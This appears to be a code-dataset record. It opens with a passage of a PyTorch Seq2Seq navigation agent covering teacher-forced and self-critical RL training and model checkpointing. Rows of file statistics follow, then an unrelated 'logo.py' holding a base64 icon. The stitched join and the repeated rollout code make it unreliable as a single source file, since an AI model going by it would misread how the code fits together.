if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is just a constant so it doesn't matter
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# chooes one from three according to prob
# for t,p in zip(traj, action_scores):
# t['prob'] = p
# chooes one from three according to prob
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def pretrain_rollout_with_loss(self):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# when there are multiple sentences, perm_idx will simply be range(batch_size).
# but perm_idx for each batch of i-th(i=1 or 2 or 3) will be inside seq_length.
# this means:
# seq_lengths=[(seq_lengths,perm_idx),(seq_lengths,perm_idx),(seq_lengths,perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
## Forward through encoder, giving initial hidden state and memory cell for decoder
#f_t = self._feature_variable(perm_obs)
#if self.decoder.panoramic: f_t_all, f_t = f_t
#else: f_t_all = np.zeros((batch_size, 1))
#ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
###ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
#if not self.decoder_init:
# h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# #c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permuation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths, f_t_all=f_t_all)
if t == 0: # use encoder's ht and ct as init
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, en_ht, en_ct, ctx, vl_mask)
else: # otherwise unroll as lstm
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, de_ht, de_ct, ctx, vl_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is just a constant so it doesn't matter
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# chooes one from three according to prob
# for t,p in zip(traj, action_scores):
# t['prob'] = p
# chooes one from three according to prob
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def test(self, use_dropout=False, feedback='argmax', allow_cheat=False, beam_size=1, successors=1, speaker=(None,None,None,None)):
''' Evaluate once on each instruction in the current environment '''
if not allow_cheat: # permitted for purpose of calculating validation loss only
assert feedback in ['argmax', 'sample'] # no cheating by using teacher at test time!
self.feedback = feedback
if use_dropout:
self.encoder.train()
self.decoder.train()
else:
self.encoder.eval()
self.decoder.eval()
super(Seq2SeqAgent, self).test(beam_size, successors, speaker)
def train(self, encoder_optimizer, decoder_optimizer, n_iters, aux_n_iter, feedback='teacher'):
''' Train for a given number of iterations '''
assert feedback in self.feedback_options
self.feedback = feedback
self.encoder.train()
self.decoder.train()
self.losses = []
self.losses_ctrl_f = []
epo_inc = 0
for iter in range(1, n_iters + 1):
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
epo_inc += self.env.epo_inc
return epo_inc
def rollout_notrain(self, n_iters): # jolin
epo_inc = 0
for iter in range(1, n_iters + 1):
self.env._next_minibatch(False)
epo_inc += self.env.epo_inc
return epo_inc
def rl_rollout(self, obs, perm_obs, seq, seq_mask, seq_lengths, perm_idx, feedback,
encoder, decoder):
batch_size = len(perm_obs)
# Record starting point
traj = [{'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if decoder.action_space==-1:
u_t_prev = decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() *
self.model_actions.index('<start>'), requires_grad=False).to(device)
ended=np.array([False] * batch_size)
# Do a sequence rollout not don't calculate the loss for policy gradient
# self.loss = 0
env_action = [None] * batch_size
# Initialize seq log probs for policy gradient
if feedback == 'sample1':
seqLogprobs = h_t.new_zeros(batch_size, self.episode_len)
mask = np.ones((batch_size, self.episode_len))
elif feedback == 'argmax1':
seqLogprobs, mask = None, None
else:
raise NotImplementedError('other feedback not supported.')
# only for supervised auxiliary tasks
#assert (not self.decoder.ctrl_feature) # not implemented
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Decoding actions
h_t, c_t, alpha, logit, pred_f = decoder(a_t_prev, u_t_prev, u_t_features,
f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# Mask outputs where agent can't move forward
if decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else: logit[is_valid == 0] = -float('inf')
# Supervised training
# target = self._teacher_action(perm_obs, ended)
# self.loss += self.criterion(logit, target)
# Determine next model inputs
if feedback == 'argmax1':
_, a_t = logit.max(1)
elif feedback == 'sample1':
logprobs = F.log_softmax(logit, dim=1)
probs = torch.exp(logprobs.data)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
sampleLogprobs = logprobs.gather(1, a_t.unsqueeze(1))
else:
sys.exit('invalid feedback method %s'%feedback)
# if self.decoder.panoramic:
# a_t_feature = all_a_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if decoder.action_space == 6:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == self.model_actions.index('<end>'):
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == 0: ended[i] = True
env_action[idx] = action_idx
obs = np.array(self.env._get_obs(self.env.step(env_action, obs)))
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'],
ob['heading'], ob['elevation']))
if seqLogprobs is not None: # feedback == 'sample1'
seqLogprobs[:, t] = sampleLogprobs.view(-1)
# Early exit if all ended
if ended.all(): break
path_res = {}
for t in traj:
path_res[t['instr_id']] = t['path']
return traj, mask, seqLogprobs, path_res
def rl_train(self, train_Eval, encoder_optimizer, decoder_optimizer,
n_iters, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
''' jolin: self-critical finetuning'''
self.losses = []
epo_inc = 0
self.encoder.train()
self.decoder.train()
for iter in range(1, n_iters + 1): # n_iters=interval
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
# copy from self.rollout():
# one minibatch (100 instructions)
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
epo_inc += self.env.epo_inc
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
gen_traj, mask, seqLogprobs, gen_results = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'sample1',
self.encoder, self.decoder)
# jolin: get greedy decoding baseline
# Just like self.test(use_dropout=False, feedback='argmax').
# But we should not do env.reset_epoch(), because we do not
# test the whole split. So DON'T reuse test()!
world_states = self.env.reset_batch()
obs = np.array(self.env._get_obs(world_states))# for later 'sample' feedback batch
perm_obs = obs[perm_idx]
if self.monotonic:
encoder2, decoder2 = self.encoder2, self.decoder2
else:
self.encoder.eval()
self.decoder.eval()
encoder2, decoder2 = self.encoder, self.decoder
with torch.no_grad():
greedy_traj, _, _, greedy_res = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'argmax1',
encoder2, decoder2)
if not self.monotonic:
self.encoder.train()
self.decoder.train()
# jolin: get self-critical reward
reward = self.get_self_critical_reward(gen_traj, train_Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale)
# jolin: RewardCriterion
self.loss = self.PG_reward_criterion(seqLogprobs, reward, mask)
self.losses.append(self.loss.item())
self.loss.backward()
#clip_gradient(encoder_optimizer)
#clip_gradient(decoder_optimizer)
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
return epo_inc
def PG_reward_criterion(self, seqLogprobs, reward, mask):
# jolin: RewardCriterion
input = to_contiguous(seqLogprobs).view(-1)
reward = to_contiguous(torch.from_numpy(reward).float().to(device)).view(-1)
#mask = to_contiguous(torch.cat([mask.new(mask.size(0), 1).fill_(1), mask[:, :-1]], 1)).view(-1)
mask = to_contiguous(torch.from_numpy(mask).float().to(device)).view(-1)
output = - input * reward * mask
loss = torch.sum(output) / torch.sum(mask)
return loss
def get_self_critical_reward(self, traj, Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
# get self-critical reward
instr_id_order = [t['instr_id'] for t in traj]
gen_scores = Eval.score_batch(gen_results, instr_id_order)
greedy_scores = Eval.score_batch(greedy_res, instr_id_order)
# normal score
gen_hits = (np.array(gen_scores['nav_errors']) <= 3.0).astype(float)
greedy_hits = (np.array(greedy_scores['nav_errors']) <= 3.0).astype(float)
gen_lengths = (np.array(gen_scores['trajectory_lengths'])).astype(float)
# sr_sc
hits = gen_hits - greedy_hits
#reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
# spl
gen_spls = (np.array(gen_scores['spl'])).astype(float)
greedy_spls = (np.array(greedy_scores['spl'])).astype(float)
ave_steps = (np.array(gen_scores['trajectory_steps'])).sum()/float(len(instr_id_order))
steps = (np.array(gen_scores['trajectory_steps']) - self.episode_len).sum()
if self.reward_func == 'sr_sc':
reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
elif self.reward_func == 'spl':
reward = np.repeat(gen_spls[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_sc':
# spl_sc
spl_sc = gen_spls - greedy_spls
reward = np.repeat(spl_sc[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_last': # does not work
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
elif self.reward_func == 'spl_last_sc':
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = [x - y for x, y in zip(gen_scores['spl'], greedy_scores['spl'])]
elif self.reward_func == 'spl_psc': # test
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.full((gen_spls.shape[0], self.episode_len), -sc_length_scale, dtype=float) # penalty
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
# discounted immediate reward
if sc_discouted_immediate_r_scale>0:
discounted_r = discount_rewards(gen_scores['immediate_rewards'], self.episode_len) * sc_discouted_immediate_r_scale
reward = reward + discounted_r
# panelty for length
if sc_length_scale:
length_panelty = np.repeat(gen_lengths[:, np.newaxis], self.episode_len, 1)*sc_length_scale
reward = reward - length_panelty
return reward
def save(self, encoder_path, decoder_path):
''' Snapshot models '''
write_num = 0
while (write_num < 10):
try:
torch.save(self.encoder.state_dict(), encoder_path)
torch.save(self.decoder.state_dict(), decoder_path)
if torch.cuda.is_available():
torch.save(torch.cuda.random.get_rng_state(), decoder_path + '.rng.gpu')
torch.save(torch.random.get_rng_state(), decoder_path + '.rng')
with open(decoder_path + '.rng2', 'wb') as f:
pickle.dump(random.getstate(), f)
break
except:
write_num += 1
def delete(self, encoder_path, decoder_path):
''' Delete models '''
os.remove(encoder_path)
os.remove(decoder_path)
os.remove(decoder_path+'.rng.gpu')
os.remove(decoder_path+'.rng')
os.remove(decoder_path+'.rng2')
def load(self, encoder_path, decoder_path):
''' Loads parameters (but not training state) '''
self.encoder.load_state_dict(torch.load(encoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'))
self.decoder.load_state_dict(torch.load(decoder_path, 'cuda:0' if torch.cuda.is_available() else 'cpu'), strict=False)
self.encoder.to(device)
self.decoder.to(device)
if self.monotonic:
self.copy_seq2seq()
try:
with open(decoder_path+'.rng2','rb') as f:
random.setstate(pickle.load(f))
torch.random.set_rng_state(torch.load(decoder_path + '.rng'))
torch.cuda.random.set_rng_state(torch.load(decoder_path + '.rng.gpu'))
except FileNotFoundError:
print('Warning: failed to find random seed file')
def copy_seq2seq(self):
self.encoder2=copy.deepcopy(self.encoder)
self.decoder2=copy.deepcopy(self.decoder)
self.encoder2.eval()
self.decoder2.eval()
for param in self.encoder2.parameters():
param.requires_grad = False
for param in self.decoder2.parameters():
param.requires_grad = False
| 46.247555
| 225
| 0.573598
| 18,815
| 151,322
| 4.353973
| 0.036779
| 0.02041
| 0.011267
| 0.011816
| 0.933508
| 0.9276
| 0.923499
| 0.915637
| 0.911975
| 0.910413
| 0
| 0.007368
| 0.326436
| 151,322
| 3,271
| 226
| 46.261694
| 0.79636
| 0.154617
| 0
| 0.890249
| 0
| 0
| 0.033074
| 0
| 0
| 0
| 0
| 0.000917
| 0.023129
| 1
| 0.031293
| false
| 0
| 0.010431
| 0.002268
| 0.072109
| 0.003628
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c79cb908a9334fa7d27f59257a61b99895fc0fc4
| 90,228
|
py
|
Python
|
static/logo.py
|
DCTewi/EzLottery
|
184447b190d77716243c0516469ab683ee8e0629
|
[
"MIT"
] | 1
|
2020-05-06T10:27:13.000Z
|
2020-05-06T10:27:13.000Z
|
static/logo.py
|
DCTewi/Md5Checker
|
ae536f41a5b96cb6d45170370252abbbd6d84729
|
[
"MIT"
] | null | null | null |
static/logo.py
|
DCTewi/Md5Checker
|
ae536f41a5b96cb6d45170370252abbbd6d84729
|
[
"MIT"
] | null | null | null |
"""
Icon Base64
"""
icon = b'AAABAAEAgIAAAAEAIAAoCAEAFgAAACgAAACAAAAAAAEAAAEAIAAAAAAAAAABAMMOAADDDgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA